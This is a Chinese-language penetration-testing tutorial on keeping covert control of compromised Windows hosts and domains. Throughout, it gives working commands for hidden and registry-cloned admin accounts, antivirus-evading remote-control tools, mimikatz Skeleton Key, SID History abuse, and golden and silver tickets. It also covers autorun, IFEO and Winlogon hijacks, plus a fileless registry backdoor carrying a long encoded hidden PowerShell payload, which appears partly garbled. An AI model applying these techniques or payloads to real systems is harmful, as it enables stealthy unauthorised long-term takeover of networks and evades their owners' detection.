内网渗透之权限维持：从域环境到单机的持久化控制指南

在内网渗透测试中，当我们成功拿下目标主机的初始权限后，如何实现持久化控制、避免因漏洞修复或系统重启导致权限丢失，是整个渗透流程中至关重要的一环。权限维持技术，就是帮助我们在目标系统中留下 "后门"，实现对目标的长期可控。本文将从域环境 和单机环境两个维度，梳理内网渗透中常用的权限维持技术，带你掌握从账户隐藏到票据伪造的各类实战技巧。

一、域环境权限维持

在域环境下，权限维持的目标通常是维持对域内主机甚至域控的长期控制，这类技术往往更隐蔽，能够绕过常规的安全检测。

1.1 创建隐藏账户：工具化快速搭建隐蔽入口

最基础的权限维持方式，就是创建一个常规命令无法检测到的隐藏账户，通过这个账户我们可以随时通过 3389 等远程桌面登录目标主机。

我们可以使用CreateHiddenAccount\_upx\_v0\.2\.exe这个工具快速创建隐藏账户，操作步骤非常简单：

将工具上传到目标主机的桌面，进入 CMD 执行命令：
复制代码
```
cd desktop
CreateHiddenAccount_upx_v0.2.exe -u xiaolin -p xiaolin!@#45
```
这条命令会创建一个名为xiaolin、密码为xiaolin\!@\#45的隐藏账户。
验证账户：常规的net user等命令无法查看这个隐藏账户，只有在控制面板的用户管理中才能看到，并且这个账户默认属于管理员组，拥有完整的系统权限。
检测隐藏账户：该工具还自带检测功能，可以查看目标主机是否存在隐藏账户：
复制代码
```
 CreateHiddenAccount_upx_v0.2.exe -c
```

这个工具同时支持域环境和单机环境，在单机环境下创建的隐藏账户，常规方式甚至无法直接删除，隐蔽性极强。

1.2 影子账户：注册表级的账户克隆后门

比普通隐藏账户更隐蔽的是影子账户，这类账户不仅在 CMD 命令行中无法查看，甚至在 "计算机管理" 的用户列表中也完全隐藏，但却拥有管理员的完整权限，是内网渗透中非常经典的后门技术。

影子账户的核心原理是克隆管理员账户的权限，通过修改注册表，让我们的隐藏账户继承管理员的所有权限，即使删除了账户本身，注册表中的配置依然保留，账户依然可以正常登录。

影子账户创建步骤：

首先创建一个带$后缀的测试账户（$后缀可以让net user命令默认隐藏这个账户）：
复制代码
```
net user aaa$ 123456 /add
```
打开注册表编辑器，定位到以下路径：
复制代码
```
HKEY_LOCAL_MACHINE/SAM/SAM/Domains/Account/Users/
```
注意：默认情况下 SAM 注册表项没有权限访问，需要手动给当前账户添加权限才能查看。
找到管理员账户Administrator对应的十六进制 ID 文件夹，打开其中的F值，将这个值的内容完整复制。然后找到我们刚刚创建的aaa$账户对应的十六进制 ID 文件夹，将它的F值替换为管理员的F值，这样我们的账户就继承了管理员的所有权限。

找到Names目录下的aaa$对应的项，将它导出为注册表文件保存到桌面。
执行命令删除我们刚刚创建的aaa$账户，这一步会让系统的用户列表中彻底删除这个账户的记录：
复制代码
```
net user aaa$ /del
```
双击我们刚刚导出的注册表文件，将配置重新导入到注册表中。

完成以上步骤后，影子账户就创建完成了！我们可以直接使用aaa$这个账户登录系统，登录后实际是以管理员的身份运行，所有操作都和管理员完全一致，而且这个账户在系统的任何用户列表中都无法被查看，隐蔽性极强。

影子账户的利用注意事项：

克隆管理员账户时，要注意原管理员账户是否被禁用，如果原账户被禁用，克隆出的影子账户也会是禁用状态。
如果克隆的是当前正在登录的账户，使用影子账户登录时会导致原账户被挤下线，因此建议新建一个临时管理员账户，克隆这个临时账户后再删除临时账户，这样就不会影响原账户的使用。
即使修改了原账户的密码，影子账户的登录密码依然有效，不会受到影响。

1.3 白名单远控：GotoHttp 与 RustDesk 的免杀持久化

常规的远控后门比如 CS、MSF 生成的木马，往往需要复杂的免杀处理才能绕过杀毒软件，而我们可以直接使用市面上的正规远控软件，这类软件早已被各大安全厂商加入白名单，完全不需要免杀，直接上传运行就可以实现控制。

在内网渗透中，最常用的两款轻量远控就是GotoHttp和RustDesk。

GotoHttp：浏览器端的轻量远控

GotoHttp 是一款非常轻量的远控工具，不需要安装，上传到目标主机直接运行即可：

运行 GotoHttp 后，会在当前目录生成一个记录了目标主机 ID 和控制码的文件。
我们只需要在本地浏览器打开对应的控制网址，输入 ID 和控制码，就可以直接在浏览器中控制目标主机，不需要安装任何控制端软件。

它的优势非常明显：

流量走 HTTPS 协议，只要目标主机开放 443 端口就可以通信，大部分环境都会放行 443 端口。
资源占用极低，低带宽环境下也能流畅使用，几乎不会被目标主机的用户察觉。
完全免杀，作为正规工具不会被杀毒软件拦截。

RustDesk：跨网络的开源远控

RustDesk 是一款开源的远控软件，和 GotoHttp 相比，它的优势在于即使目标主机没有外网，在内网环境下也能实现控制，非常适合内网渗透的场景。

使用方式同样非常简单：

将 RustDesk 上传到目标主机，直接运行，不需要安装。
运行后，目标主机会在用户目录下生成配置文件，路径为：
复制代码
```
C:\Users\用户名\AppData\Roaming\RustDesk\config
```
在这个配置文件中我们可以找到目标主机的 ID 和连接密码。
我们在本地打开 RustDesk，输入目标的 ID 和密码，就可以直接连接控制目标。

如果目标主机没有外网，无法通过 ID 连接，我们还可以开启 IP 直连模式：

在目标主机的 RustDesk 配置文件中添加以下配置：
复制代码
```
direct-server = 'Y'
direct-access-port = '8445'
```
这会开启 IP 直接访问，设置远程访问的端口为 8445。
之后我们就可以直接通过目标主机的内网 IP + 端口，直接连接控制，不需要外网环境。

RustDesk 同样属于正规白名单软件，在内网环境下完全不需要担心免杀问题，是内网权限维持的绝佳选择。

1.4 登录进程劫持：Skeleton Key 万能密码技术

Skeleton Key（骨架密钥）技术，是一种注入到 LSASS 进程的权限维持技术，它可以给域内所有账户添加一个万能密码，注入完成后，我们可以使用任意域账户，配合这个万能密码，登录域内的任何主机，不需要知道账户的真实密码。

这个技术的操作步骤如下：

首先我们需要拿到域控的权限，将 mimikatz 工具上传到域控主机。
在域控上运行 mimikatz，执行以下命令：
复制代码
```
privilege::debug
misc::skeleton
```
这两条命令会将万能密码注入到 LSASS 进程中，默认的万能密码是mimikatz。
注入完成后，我们就可以在任意域内主机，使用这个万能密码连接域控：
复制代码
```
net use \\owa2010cn-god\ipc$ "mimikatz" /user:god.org\任意域账户
dir \\owa2010cn-god\c$
```
不管我们用哪个域账户，只要密码填mimikatz，就可以成功验证身份，访问域控的资源。

注意：Skeleton Key 技术是注入到内存中的，一旦域控主机重启，LSASS 进程会重新加载，万能密码就会失效，因此这是一种临时的权限维持方式，适合在渗透过程中临时使用。

1.5 用户属性篡改：SID History 的权限继承后门

SID History 是 Windows 域中用户的一个属性，原本的作用是在用户跨域迁移时，保留用户原来的 SID，让用户依然可以访问原来域中的资源。而我们可以利用这个属性，给普通用户添加管理员的 SID，让普通用户直接拥有管理员的权限，实现权限维持。

操作步骤如下：

首先拿到域控权限，导入 ActiveDirectory 模块，查看目标用户的 SID History 属性：
复制代码
```
Import-Module ActiveDirectory
Get-ADUser webadmin -Properties sidhistory
```
同时我们可以通过以下命令查看用户的 SID：
复制代码
```
wmic useraccount get sid,name
```
运行 mimikatz，执行以下命令，将管理员的 SID 添加到普通用户的 SID History 中：
复制代码
```
privilege::debug
sid::patch
sid::add /sam:webadmin /new:administrator
```
再次查看用户的 SID History，就可以看到普通用户已经拥有了管理员的 SID，这意味着这个普通用户现在拥有了管理员的所有权限。
之后我们就可以直接用这个普通用户的身份，访问域控的资源，完全不需要管理员账户：
复制代码
```
dir \\owa2010cn-god\c$
```

这种方式非常隐蔽，不会修改用户的组信息，常规的权限检查很难发现普通用户偷偷拥有了管理员权限，是非常隐蔽的域权限维持后门。

1.6 票据伪造：黄金票据与白银票据的域控持久化

Kerberos 认证是域环境的核心认证方式，我们可以通过伪造 Kerberos 票据，实现不需要明文密码、直接获取域管权限的持久化后门，这就是黄金票据和白银票据技术。

黄金票据：全权限的域控后门

黄金票据的原理是伪造 TGT 票据，使用 krbtgt 账户的 NTLM Hash 加密，因为 krbtgt 是域内所有票据的加密账户，所以用它的 Hash 加密的票据，会被所有域控认为是合法的，而且这个票据可以拥有任意的权限，访问域内的任何资源。

黄金票据的制作步骤：

首先在第一次拿下域控权限时，导出 krbtgt 账户的 NTLM Hash：
复制代码
```
privilege::debug
lsadump::lsa /patch
```
这一步会得到 krbtgt 的 Hash 值，我们需要把这个值保存下来，这是制作黄金票据的核心。
获取域的 SID 值，我们可以在任意域内主机执行以下命令获取：
复制代码
```
whoami /all
wmic useraccount get sid,name
```

拿到这些信息后，我们就可以用 mimikatz 生成黄金票据：

复制代码

kerberos::golden /user:webadmin /domain:god.org /sid:域SID /krbtgt:krbtgt的Hash /ticket:xiaolin.kirbi

生成票据后，我们先清除当前主机的所有票据，然后将伪造的黄金票据导入内存：
复制代码
```
klist purge
mimikatz.exe "Kerberos::ptt xiaolin.kirbi"
```
导入完成后，我们就可以直接用这个票据，访问域控的所有资源，完全不需要任何密码：
复制代码
```
dir \\owa2010cn-god\c$
```

黄金票据是非常强大的权限维持后门，只要我们保存了 krbtgt 的 Hash，哪怕域控重启、哪怕我们之前的权限全部丢失，我们随时都可以重新制作黄金票据，再次获取域管权限，几乎是永久的域控后门。

白银票据：指定服务的受限后门

白银票据和黄金票据类似，但是它是伪造服务票据，而不是 TGT 票据，它使用的是服务账户的 Hash，而不是 krbtgt 的 Hash，因此它只能访问指定的服务，比如 CIFS 共享、HTTP 服务等，权限比黄金票据小，但是它的优势是不需要域管权限就可以制作，隐蔽性更强。

白银票据的制作步骤：

获取域 SID 和目标服务账户的 NTLM Hash。
用 mimikatz 生成白银票据：
复制代码
```
kerberos::golden /user:webadmin /domain:god.org /sid:域SID /target:owa2010cn-god /service:cifs /rc4:服务账户Hash /ptt
```
这里的service指定了我们要访问的服务，比如cifs就是共享文件服务。
生成后直接就可以访问目标主机的对应服务了。

黄金票据和白银票据的区别：

特性	黄金票据	白银票据
加密密钥	krbtgt 的 NTLM Hash	服务账户的 NTLM Hash
权限范围	域内所有资源、所有服务	仅指定的目标服务
所需权限	需要域管权限获取 krbtgt Hash	仅需要服务账户的 Hash
持久化	长期有效，只要 krbtgt Hash 不变	仅针对指定服务

二、单机环境权限维持

除了域环境，在单机环境下，我们也有很多权限维持的方式，这些方式大多利用 Windows 的系统机制，实现开机自动运行后门，保证重启后权限不丢失。

2.1 启动项持久化：开机自启的经典后门方案

最经典的权限维持方式，就是利用 Windows 的自启动机制，让后门程序在开机时自动运行，这样只要系统重启，后门就会自动上线，我们就能重新拿到权限。

Windows 的自启动有多种实现方式：

1. 自启动目录加载

Windows 有一个专门的自启动目录，放在这个目录下的程序，会在用户登录时自动运行：

Windows 2003 的路径：C:\\Documents and Settings\\Administrator\\「开始」菜单\\程序\\启动
新版 Windows 的路径：C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp

我们只需要把后门程序（比如 CS 木马）放到这个目录下，系统重启后，后门就会自动运行，以当前用户的权限上线。

2. 自启动服务加载

除了目录，我们还可以创建一个系统服务，把后门程序作为服务的执行文件，设置服务为自动启动，这样开机时服务就会自动运行，而且服务是以 System 权限运行的，比用户权限更高。

创建服务的命令非常简单：

复制代码

sc create ServiceTest binPath= C:\6.exe start= auto

这条命令会创建一个名为ServiceTest的服务，执行文件是我们的后门C:\\6\.exe，并且设置为自动启动，重启后后门就会以 System 权限自动上线。

如果要删除这个服务，执行：

复制代码

sc delete ServiceTest

3. 注册表启动项加载

我们还可以修改注册表的启动项键值，来实现自启动，这也是最常用的方式：

当前用户的启动项：HKEY\_CURRENT\_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run
系统级的启动项：HKEY\_LOCAL\_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run

我们可以通过 REG 命令直接添加注册表键值：

复制代码

REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "backdoor" /t REG_SZ /F /D "C:\6.exe"

添加完成后，重启系统，后门就会自动运行，写入用户注册表就是用户权限，写入系统注册表就是 System 权限。

4. 计划任务

我们还可以创建计划任务，让系统定时运行后门程序，比如每天运行一次，这样哪怕后门被删除了，到时间也会重新运行：

Windows 旧版本使用 at 命令：
复制代码
```
at 18:44 c:\6.exe
```
Windows 2012 及以后使用 schtasks 命令：
复制代码
```
schtasks /create /ru "SYSTEM" /tn beacon /sc DAILY /tr c:\6.exe /F
```
这条命令会创建一个每天运行的计划任务，以 System 权限运行我们的后门。

2.2 映像劫持：借系统程序之名执行恶意代码

映像劫持是 Windows 的一个系统机制，原本是用来给程序添加调试器的，我们可以利用这个机制，当用户运行某个系统程序时，自动运行我们的后门程序，实现后门的触发。

最基础的映像劫持，就是修改注册表，让用户运行记事本时，实际运行我们的后门：

复制代码

REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe" /v debugger /t REG_SZ /d "C:\windows\system32\cmd.exe /c calc"

这样当用户打开记事本的时候，实际会打开计算器，当然我们可以把这里换成我们的后门程序。

但是这种基础的劫持，会导致原程序无法运行，很容易被用户发现，我们可以配合GlobalFlag实现静默劫持，也就是原程序可以正常运行，用户关闭程序后，我们的后门自动运行：

复制代码

reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe" /v GlobalFlag /t REG_DWORD /d 512
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe" /v ReportingMode /t REG_DWORD /d 1
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe" /v MonitorProcess /d "C:\6.exe"

这样用户打开记事本的时候，记事本可以正常使用，完全没有异常，当用户关闭记事本的时候，我们的后门程序就会自动运行，用户完全不会察觉，隐蔽性极强。

2.3 登录界面劫持：Winlogon 触发的后门

Windows 在用户登录的时候，会运行userinit\.exe这个程序，用来初始化用户环境，我们可以修改这个注册表项，在用户登录的时候，自动运行我们的后门。

注册表的路径是：

复制代码

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\userinit

默认的值是C:\\Windows\\System32\\userinit\.exe，我们可以在后面添加我们的后门程序，用逗号分隔：

复制代码

REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\winlogon" /V "Userinit" /t REG_SZ /F /D "C:\Windows\system32\userinit.exe,C:\6.exe"

这样当用户登录系统的时候，系统会先运行userinit\.exe，然后自动运行我们的后门程序，只要用户登录，后门就会自动上线，非常稳定。

2.4 无文件落地：内存级的免杀持久化

如果我们担心后门文件被杀毒软件查杀，我们还可以配合无文件落地技术，把后门的代码直接写到注册表中，完全不需要落地文件，实现内存级的免杀。

操作步骤非常简单：

用 CS 或者其他工具，生成 Powershell 版本的后门代码，并且编码成 base64 格式。

把这段编码后的代码，直接写到我们刚才的 Winlogon 注册表项中：

复制代码

REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\winlogon" /V "Userinit" /t REG_SZ /F /D "C:\Windows\system32\userinit.exe,powershell -nop -w hidden -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACgASAA0AHMASQBBAEEAQQBBAEEAQQBBAEEAQQBLADEAWABiAFgATwBpAHkAaABMACsASABIADgARgBIADEASwBsAFYAbwB5AEwAbwBrAGIAMwBWAHEAbwBPAEsAQQBnAHEAKwBJAEkAdgBNAFQAbQBwADEATQBnAE0AaQBQAEsAaQBNAEsAQgA0AGQAdgAvADcAYQBWAEIAegBzAG4AZQB6ADkAMgA3AFYAdgBhAG0AeQBNAGcAegBkAFAAZAAxAFAAUAA5ADMAVAA2AEkAVABlADYAegBTAHcARABhAHIANgBtAEQARAAzAGMAeABLAEUAdAB1ADgAeAAxAFYAegB1AHQAdQBNAHIAbABIAGwAawAvAHMAagBuAHoATQBnAHoAYQBMAHEAZABMAHQANABzAFEAdAA5ADIAZwBXACsAOABJAFkAdwBEAEUAbwBiAE0AWAA3AG0AYgBFAFEAcQBRAHkAeABSAHUAWQB4AFMAOAB1AFQANgBPAEgARgBKAGkAcwBvAGQAVQBrAE8AQQBvAEkATQBXAGIAbQA5AHgATgB0AGgAVgA1AEkAVABMAEoAbQA0AGUAbwBIAFoATQAzAGwAOQBDADEAagAwAE0ANABxAFAARABDADcAMwBZAGQAMwAwAFcAMgA5AC8AcgAxAGEAegBzAEsAQQB1AEwAUgA4ADMATwA1AFMAeQBnAGYAaABzAFIAZABPAFQAWQBKAEMAMABYAG0ARwA3AE4AWQBrADQARABjAEQAMQBjAGIAWQBsAEQAbQBMACsAYgAyAHIAZAB4ADEALwBCAFYAeQBMAG0ASgBKAEcAeABsAHIAQwBJAGoAMwBjAFAAcAB1ADQAQgBzAG8AagBhAEMAcwA3AHgAeQBiAEYAdgBKAC8ALwBwAGsAdgB2AHQAeABYAFgAcwB2AGkAUABrAEoATwBXAE0AagByAFMAVQBpAEoAVwA4AGEATwBrAHkAOAB5ADMANAB2AHAAZwBkAE4AawBSAHcAcAA1ADEAVABZAEMAUAAvAFIATgBXAGwANwBZAEgAbABjAHQAegB6AEwAdgB0AGMAeAA1ADkAZQB4ADcAdgBuAGkASgB6AE4AbwBoAGkATwBQAFgAUQBhAFoAVwB6AHoAcQBGAFAAQwB4AEgAZwBBADEALwB4AGoAQgBmAFkAbAA3AFMAOAAxADUAZQBYADUAawAvADMAcgAyAFoAUgBCADYAMQBYAFYASgBXAFAARQBvAEMAZgA2AGUAVABJAEwAWQBOAEUAcABaAGwANQBHAEcASABUAEkAZwBKAGEAdgBrAFEAMAB1AGQAWgArAFMASQA0AEUAUgBBAGEAQgBSADUAegA5AFEAWAAwAFkAbgA5AEwAQwByAGQAZQA1AEQAZwBsAHMAUAB2AHkAdQAzAFoAZgBDAHgAbwA1AFgATQBIADkAWABhAFgAQwBSAHkAVwBRAEcAdABHAGcAVwBMAHAAdwA0AG4AZgBnAFUARABQAGUAbgBNADEAQgBPAEQAOQA1AC8ANABGAGMAUgBmAGoANwBpAFcARABGADMAUABmAGMASgAxAFQARgB4AEMARQBXAG8AdQBTAE4AQQByADQAZgB1AEoAcQA3AHUAWABuAEoAbABnAFQAaQBLAFkAegA4ADAATQA3ADAASABoAG0AMgB4AEsAagBnAEIASwBKACsAawBLAFQAcABuAEEAWQBSAEsAYgA3ACsAawA1AC8AegBzAFYAZgBOAHMAUABSAEwAUQA1AFcAcgAxAGsAWABuAG4ASgA2AHoASAA0AC8ATQB5ADkAeQAzADgAVwB2AHUAcABwAGkANwBzAEMAZgBkAGYAMQB0AEYAdABvAE4ASgBrAEwANwAvAGQAVABWADAAaQBHAGwANwBwAEoATgA0AHkATABXAE4ASwArAEUATABuACsAVwBNAG0AQQA3AEoAOABDAGgAZgB4AFQAVAB3AHMANQBDAC8AdgBDAEMANABjADAARQBuAG4AdwBMADYAOAByAE8AYQA2AE4AcgAwAFgAVgBjADQATwA4AGMAYgBrAFAAYwBRAHYAQQBKAEsARgBIADkAMAA1AHAAegBEAFEAbAA3AHgAVgBPAEkAQwBmAHUAZABuAG8ATwBtAHQAQwBXAFYARwByAHQASwBYADAAawBxAHUAcAA2AGYAUABLAFoAZgBiAEQAZwByAEQARQ BqAE8ASwBvAE0ANgBOAEUAcQBNAFQANQBCAEIAYwBZAG4AZwB2AHQAQwArAHYAKwBJAGoANgAyAFQATAAvAGoANwB0AHEANQBGAEQAYgBRAEMARwA5AG0AbgBzAHQAZgBnAEwAcAA1AGUAaQAyADcAMABIAEYAUgBBAFoAawBGADIAQwBZADYAagB0AGkAMgBNAGgASgBVAFMAawB4AHMAbwAyAEoAawBPAGkAMgBkAFgAVQBoAC8AeQBrAG0AYgBlAFEANABVAEgASgBnAEsAWQBhAGMAdwBFADYASwBoAFUANQBUAHoAZwBTADQAOQBPAC8AOABLAEoAWgAxAFEAaABWADMANQB4AEEAWABwAEwATQB1AEoARABuAEkAZwBwADUAegBxAGEAaQBNAGIAcwBnAGkATwBQADgAZgAzAEwANwBXAHkAYgBrAG8AVQBxAHkAdQBJAEgAMQB3AEcAZwBpAGcATwB6ADQAdABNAFgATQA3AG8ATgBEAFgAOABxAFcAZgBpAFAAZQAvAHUAZgBkAGoAaQAvAG4AQgB6AFgAWgBBAEwAbwBrAHMAWgBJAFgANABJAGkAUQAwAEwAWgBkAE0AMABrAGcAdgBsADgAZAAzAEwARA BQAGsAQQBnAHEAbwBTAFkASAB2AEMAaQBnAGsAagBaAHEAZQB0AGIARgBDAG4AbQB0AEcAZQB5AFYAUgBOACsATgBHADAAQgBWAGoAUwBkADcATAA0AGgAUgArAE0AZgB5ADQAdgBTAFEATwBCAHIAMwBKAFQAcABnAE0ARABEAEUAYQBqAG0AUwAyAFoAeQByAGoAWgBxAGMAVwBIAFMASQBsAG0AZwBvAHMASgA3AEUAzgwBkADkAcAAzAFIAVgBPAEoAaAAvADYAeQBFAHIAbQAxAEMAdAA0AHAAcwBRAFoANwA0AGMATgBlAEQAagB0AEsAMwBPAEgAbAA2AHQANgBYAEcAcABiAGQAdQB0AGcANQA2ADQAOQBYAGgAOAByAHEAUwBaAEUAZQBWAGwAMgBwAEoAcwA5AEQASwBaAFcAWABsAFYAaQBRADkAdQAyAFcARAArAHMAdgBTAHQAegAyAGUANgBEAFgAYgBPAHcAOAA0AFkAQgByAFIATwB3ADEAeQBOAFAAQQBPAEgAQwAwAFMAWgBCADEAVABQAHIAegBPADUAMgB0AGQATwBlAEoATgBwAGkATABPADAAMwAzADgARwBCAFYARwBVAHMAOQA3AFYAUQBWADYAWgBIAEYAOABvAFQARgBZAHYAaQBNADUAMwB1AFIARwA2ADMANgBPADQAaABUADQAUwB5ADkANABmAFUAUwBYAFIAYwBTAFkAeABzAGYAZQA3AEIAbgB5AE4AbwBBADkALwBmAE4ATwBqADUAVgBFADAAbQByAEEAUQA1AEgAUABWAEgAWAB5AHcAWQArAEcAawAvAFMAdwBYAGoAUwBCAG8AbQA4ADEATABwAGcAZAB4ADgAdAByAEoAcQBzADYAaAB6AFkAMQB2AEgAeABnAEcAZgBoAHMARABlAGwAUwAyADYARQAzAEYAcQBTAGUATABXADIAcwBsAEcATwBBADIATgBIADUAMAArADkAUgBvAEMAUwA5AG0ANQBnAGsANQBWA"

这样，整个过程中，我们的后门代码完全没有落地成文件，全部存在注册表中，用户登录的时候，Powershell 直接把代码加载到内存中运行，杀毒软件很难检测到，完美实现了免杀的持久化后门。

总结

内网权限维持是渗透测试中非常重要的一环，不同的场景下我们可以选择不同的技术：域环境下我们可以用影子账户、黄金票据这类隐蔽的域后门，实现长期的域控控制；单机环境下我们可以用启动项、映像劫持这类自启动技术，保证重启后权限不丢失，配合无文件落地还能实现完美免杀。

掌握这些技术，就能让我们在渗透测试中，牢牢把控目标的权限，不会因为系统重启或者漏洞修复，导致之前的渗透成果全部丢失。